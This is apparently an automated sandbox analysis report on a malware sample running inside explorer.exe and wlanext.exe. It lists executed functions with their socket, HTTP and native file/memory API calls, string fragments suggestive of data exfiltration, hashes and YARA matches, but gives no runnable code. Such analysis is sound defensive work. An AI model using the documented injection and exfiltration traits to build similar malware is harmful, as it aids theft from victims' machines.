                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E43FE01
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E43FE2B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
                                        • Instruction ID: d0965ee7a8980bc73e418a959f569537691f8a2ee80af317fb6936aed78332d2
                                        • Opcode Fuzzy Hash: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
                                        • Instruction Fuzzy Hash: 22F0F636500551BFDB200A45EC02F63BB5AEB88731F250316F668566E1DB62F86096F0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 5268 explorer.exeCOMMON

                                        Executed Functions

                                        Function 061F5782, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: getaddrinforecvsetsockopt
                                        • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                        • API String ID: 1564272048-1117930895
                                        • Opcode ID: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
                                        • Instruction ID: 700a915225b4cc6c124a8e47bfe598a72ae32376d5cacb42ccdc5f693b8e3a7b
                                        • Opcode Fuzzy Hash: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
                                        • Instruction Fuzzy Hash: 36527031628B088BCBA9EF68D8947EAB7E1FB94300F504A2DD5AFC7146DF70A545C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F4A32, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: `
                                        • API String ID: 823142352-2679148245
                                        • Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                        • Instruction ID: 61148e7b3fdb1005421993e66b00af7382b0f0c6c3c3632fd1856ad3affbca66
                                        • Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
                                        • Instruction Fuzzy Hash: A9225A70A28A099FCB99EF28C4947AEF7E1FB98301F41462EE55ED3251DB30E451CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1FCC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: closesocket
                                        • String ID: clos$esoc$ket
                                        • API String ID: 2781271927-3604069445
                                        • Opcode ID: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
                                        • Instruction ID: a3c050bfd9f9d60991646d04d1d50cb9d593889952fea1326b8c8eb4c8f1844e
                                        • Opcode Fuzzy Hash: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
                                        • Instruction Fuzzy Hash: D6F0627121C7484FC785DF289489B99BBE1FBCA314F5806ADE44ECB245C7758542C743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1FD2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: closesocket
                                        • String ID: clos$esoc$ket
                                        • API String ID: 2781271927-3604069445
                                        • Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                        • Instruction ID: ecf54ca866b98e81bc3415f0ec568e3e5e04e26b48a3934d9da0fc17c8032d06
                                        • Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
                                        • Instruction Fuzzy Hash: C9F0177061CB089FCB84EF18D488B6ABAE1FB89314F54566DA45ECB244C77589828B02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1F52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: connect
                                        • String ID: conn$ect
                                        • API String ID: 1959786783-716201944
                                        • Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                        • Instruction ID: fd16342183a86e4b637cc3e9bf8fc64e46c2fd2eacede9471b7c4a3ba7d42cfe
                                        • Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                        • Instruction Fuzzy Hash: BD012170628A0C8FCBC4EF5CE448B5477E0EB59315F1541AE990DCB266C774C9818BC2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1F4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: connect
                                        • String ID: conn$ect
                                        • API String ID: 1959786783-716201944
                                        • Opcode ID: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                        • Instruction ID: f342e72b3c4ba29f2bcc2794cded4330c12ed006b5ee7bfb88bd317daae1dc26
                                        • Opcode Fuzzy Hash: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                        • Instruction Fuzzy Hash: 86015E70928A088FCB84EF4CD488B54B7E0EB59311F1541AA990DDB226C774D9818BC1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1ED2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: send
                                        • String ID: send
                                        • API String ID: 2809346765-2809346765
                                        • Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                        • Instruction ID: 9f40799921bb3658f44534b5416add3a56f445bdc60cc2fdacd383487e7a60b8
                                        • Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
                                        • Instruction Fuzzy Hash: 27011270518A088FDBC4EF1CD449B6577E1EB58314F1545AE995DCB266C770D8818B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1DD2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: socket
                                        • String ID: sock
                                        • API String ID: 98920635-2415254727
                                        • Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                        • Instruction ID: cb9d11343c1f4be9a48d69738e7c74405ebf7768e0d6230138eb6bc28f08397f
                                        • Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                        • Instruction Fuzzy Hash: 4D01447061860C8FCB84EF1CD048B54BBE0FB59314F1545ADD55DCB266D7B0C981CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F1DD0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: socket
                                        • String ID: sock
                                        • API String ID: 98920635-2415254727
                                        • Opcode ID: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                        • Instruction ID: a1d841f96578334744261ed6b845f64b57e3a3e1839ad0bb97cf45592119e3a3
                                        • Opcode Fuzzy Hash: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                        • Instruction Fuzzy Hash: FB018F30628B088FCB84EF1CD448B54BBE0FB99314F1945ADD85ECB226D7B0C981CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061F2038, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: closesocket
                                        • String ID:
                                        • API String ID: 2781271927-0
                                        • Opcode ID: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
                                        • Instruction ID: dab3ce9ac2f79893e038f4c2ed40bd856d77eb20f299c52fd84b657684335c5f
                                        • Opcode Fuzzy Hash: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
                                        • Instruction Fuzzy Hash: A4213631628A044BEB88DF68E89467A72E0FBD9305F84467EE88BC7286DB74C541C285
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 061EA2C9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.499871227.0000000006100000.00000040.00000001.sdmp, Offset: 06100000, based on PE: false
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                        • Instruction ID: 4652338ee778673ef4bcde5079215685bec757bbaf0470f5aadc4cfe86fd0ae7
                                        • Opcode Fuzzy Hash: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                        • Instruction Fuzzy Hash: F8312B74914F09DFDBA4EF2984982A5B7A1FF94300F14427E892DCA206C774E594CFD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Analysis Process: wlanext.exe PID: 5896 Parent PID: 3388 wlanext.exeCOMMON

                                        Executed Functions

                                        Function 00C69D40, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00C64B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00C64B87,007A002E,00000000,00000060,00000000,00000000), ref: 00C69D8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction ID: ba8a6a398530b2eaa9b01861c2e1f341e2674c8b605371a2d6951503b2bb83d3
                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction Fuzzy Hash: 78F0B2B2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C69D3B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00C64B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00C64B87,007A002E,00000000,00000060,00000000,00000000), ref: 00C69D8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: f81741586298731ecaae35a3bceb5e73f4088f3d87ff554a0bd86214ad879a8d
                                        • Instruction ID: 69640bbba44ce078d9bd4853bf920eccfa53bc1102e1e9733be584205a92709a
                                        • Opcode Fuzzy Hash: f81741586298731ecaae35a3bceb5e73f4088f3d87ff554a0bd86214ad879a8d
                                        • Instruction Fuzzy Hash: 4501B2B2204208BFCB08CF89DC85EEB37A9AF8C754F158249FA0D97241D630E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C69DF0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(00C64D42,5EB6522D,FFFFFFFF,00C64A01,?,?,00C64D42,?,00C64A01,FFFFFFFF,5EB6522D,00C64D42,?,00000000), ref: 00C69E35
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction ID: 756d5c19d1b6ff0ffc8cc985f5a6233e6362a258cbe37aff8821f60b704d84c0
                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction Fuzzy Hash: CEF0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158248BE1DA7241D630E811CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C69F20, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00C52D11,00002000,00003000,00000004), ref: 00C69F59
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction ID: 484ac617672256329346078bf5f46fa1d6f9328b6a3a433455208a0a78c15457
                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction Fuzzy Hash: 3CF015B2200208AFCB14DF89CC81EAB77ADEF88750F118148BE08A7241C630F810CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C69E6A, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(00C64D20,?,?,00C64D20,00000000,FFFFFFFF), ref: 00C69E95
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: a3f6059e3692115f624ecd4c2d7d5cec608c1dbe84257fc48b13fdde40d860de
                                        • Instruction ID: 472f5b7356a9e63ec02e28de45a2550b78161a737cca7c9e16fa30d10cb6c8c6
                                        • Opcode Fuzzy Hash: a3f6059e3692115f624ecd4c2d7d5cec608c1dbe84257fc48b13fdde40d860de
                                        • Instruction Fuzzy Hash: EDE08C76200210AFD720EBA8CC84EEB7B5AEF48360F2541A5F958AB242C134AA018A90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C69E70, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(00C64D20,?,?,00C64D20,00000000,FFFFFFFF), ref: 00C69E95
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction ID: f1679c21bee503fb2f2d103a2b99c0231f50154552afdcd9451e28c8e8e7013c
                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction Fuzzy Hash: 57D01776200214ABD720EB98CC85EA77BACEF48760F154499BA58AB242C530FA008AE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9e223557917fc8852d107b7902d7efc5bcd3b3a7f758ccc6825736a7b05f8aaf
                                        • Instruction ID: 7c11f7b366bacaff4e918cb39bd7eec070a894a8c82e1d113ec6ca817e72300f
                                        • Opcode Fuzzy Hash: 9e223557917fc8852d107b7902d7efc5bcd3b3a7f758ccc6825736a7b05f8aaf
                                        • Instruction Fuzzy Hash: D590026235184443D201A5695C24B070095E7D0343F51C116B4144555CCA5598A16561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5757e27a4a471dacea2ef151eedb5721b8ccbc8f5b3e81a90726157034e7ed42
                                        • Instruction ID: 0b3a278e247628e0df7ecaa9ef4dfd5b3fc0687174d113fa05256bf86621b3e5
                                        • Opcode Fuzzy Hash: 5757e27a4a471dacea2ef151eedb5721b8ccbc8f5b3e81a90726157034e7ed42
                                        • Instruction Fuzzy Hash: 319002B234104803D141B15954147460095E7D0341F51C012B9054555E87999DD576A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 035499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 67c58852f61a78a53baf9085f2c62c1a3faf967d0a3d1f469738f73796d9167e
                                        • Instruction ID: 73a47769149d764c95bc22826f8b25e24cdae05c5b24a59b49970a34b645861b
                                        • Opcode Fuzzy Hash: 67c58852f61a78a53baf9085f2c62c1a3faf967d0a3d1f469738f73796d9167e
                                        • Instruction Fuzzy Hash: 2D9002A238104843D101A1595424B060095E7E1341F51C016F5054555D8759DC927166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d7a024cdc3ecab2e6dc1474ef0c302f8bdc1185d1e83764beb1c53d7083198d8
                                        • Instruction ID: 216c60d5d12aa232a95911b873d8533a60e222f5f8761f71e450d1c5bc358651
                                        • Opcode Fuzzy Hash: d7a024cdc3ecab2e6dc1474ef0c302f8bdc1185d1e83764beb1c53d7083198d8
                                        • Instruction Fuzzy Hash: 3F900262382085535546F15954145074096F7E0281791C013B5404951C8666A896E661
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b9a779e9635217aa31f2eee6e34ffc8a759ae6205db808884d87543ca471aa47
                                        • Instruction ID: f808e460fd0442a834afde27b78457561f517e97d6ff3373a65e12980b69ecda
                                        • Opcode Fuzzy Hash: b9a779e9635217aa31f2eee6e34ffc8a759ae6205db808884d87543ca471aa47
                                        • Instruction Fuzzy Hash: 3E90027234104813D112A15955147070099E7D0281F91C413B4414559D97969992B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d357a3f81f6c3c602c56cec4a9a43e55ab92a71add0be8c6689cf954f3d6d417
                                        • Instruction ID: 7962a6a96355b62c99355a47503bb1494bf38317591842628a6d14cab206c296
                                        • Opcode Fuzzy Hash: d357a3f81f6c3c602c56cec4a9a43e55ab92a71add0be8c6689cf954f3d6d417
                                        • Instruction Fuzzy Hash: 6390027234104803D101A59964186460095E7E0341F51D012B9014556EC7A598D17171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d22f0e919bec24fa35a7177c3418b3a12d616dab3abd92f08a532c7ba8d36e5c
                                        • Instruction ID: de5f7fa64abc16669779f774ece781c5d96ccb9e760b2e5eca534d6bea2cecce
                                        • Opcode Fuzzy Hash: d22f0e919bec24fa35a7177c3418b3a12d616dab3abd92f08a532c7ba8d36e5c
                                        • Instruction Fuzzy Hash: 8590027235118803D111A15994147060095E7D1241F51C412B4814559D87D598D17162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: e47173ccf4d796019448379f1ce8fa500ab3e454d1646897fe7edfb719d55172
                                        • Instruction ID: e4965e9ba92c9a2599e80fa22defabd41dc35be9d8d3e4e082b48700d425231c
                                        • Opcode Fuzzy Hash: e47173ccf4d796019448379f1ce8fa500ab3e454d1646897fe7edfb719d55172
                                        • Instruction Fuzzy Hash: 4A90026A35304403D181B159641860A0095E7D1242F91D416B4005559CCA5598A96361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8702e4d81699d66759eae8c6f973e1ff9264d7f57c97cdcf463b440dcb22903e
                                        • Instruction ID: 29468e7ba19630a5ba2c1e176929fbe2d69dad9013fb3539763e5ad56a1fda90
                                        • Opcode Fuzzy Hash: 8702e4d81699d66759eae8c6f973e1ff9264d7f57c97cdcf463b440dcb22903e
                                        • Instruction Fuzzy Hash: BB90027234508C43D141B1595414A4600A5E7D0345F51C012B4054695D97659D95B6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03549660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f6c441969c632bb24dbe2887e41ada1339ff11ad22a28e8957530ba16f8122c6
                                        • Instruction ID: 2219b07dfa3738676f67fde34bd2a5063aada9aa8beced51e4d4a8a5adc342a5
                                        • Opcode Fuzzy Hash: f6c441969c632bb24dbe2887e41ada1339ff11ad22a28e8957530ba16f8122c6
                                        • Instruction Fuzzy Hash: 1C90027234104C03D181B159541464A0095E7D1341F91C016B4015655DCB559A9977E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 035496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.486305808.00000000034E0000.00000040.00000001.sdmp, Offset: 034E0000, based on PE: true
                                        • Associated: 0000000B.00000002.486821180.00000000035FB000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000B.00000002.486841810.00000000035FF000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1925f7449ccd8621130d5f38ed86fbfd786a37e9a8eca8e37d3fb0ea29b2e00f
                                        • Instruction ID: c6c03d5ce0fa3f0fd5372ee248c1e77cc9b95593d3c58b6eead68afda2884156
                                        • Opcode Fuzzy Hash: 1925f7449ccd8621130d5f38ed86fbfd786a37e9a8eca8e37d3fb0ea29b2e00f
                                        • Instruction Fuzzy Hash: 6390027234104C43D101A1595414B460095E7E0341F51C017B4114655D8755D8917561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

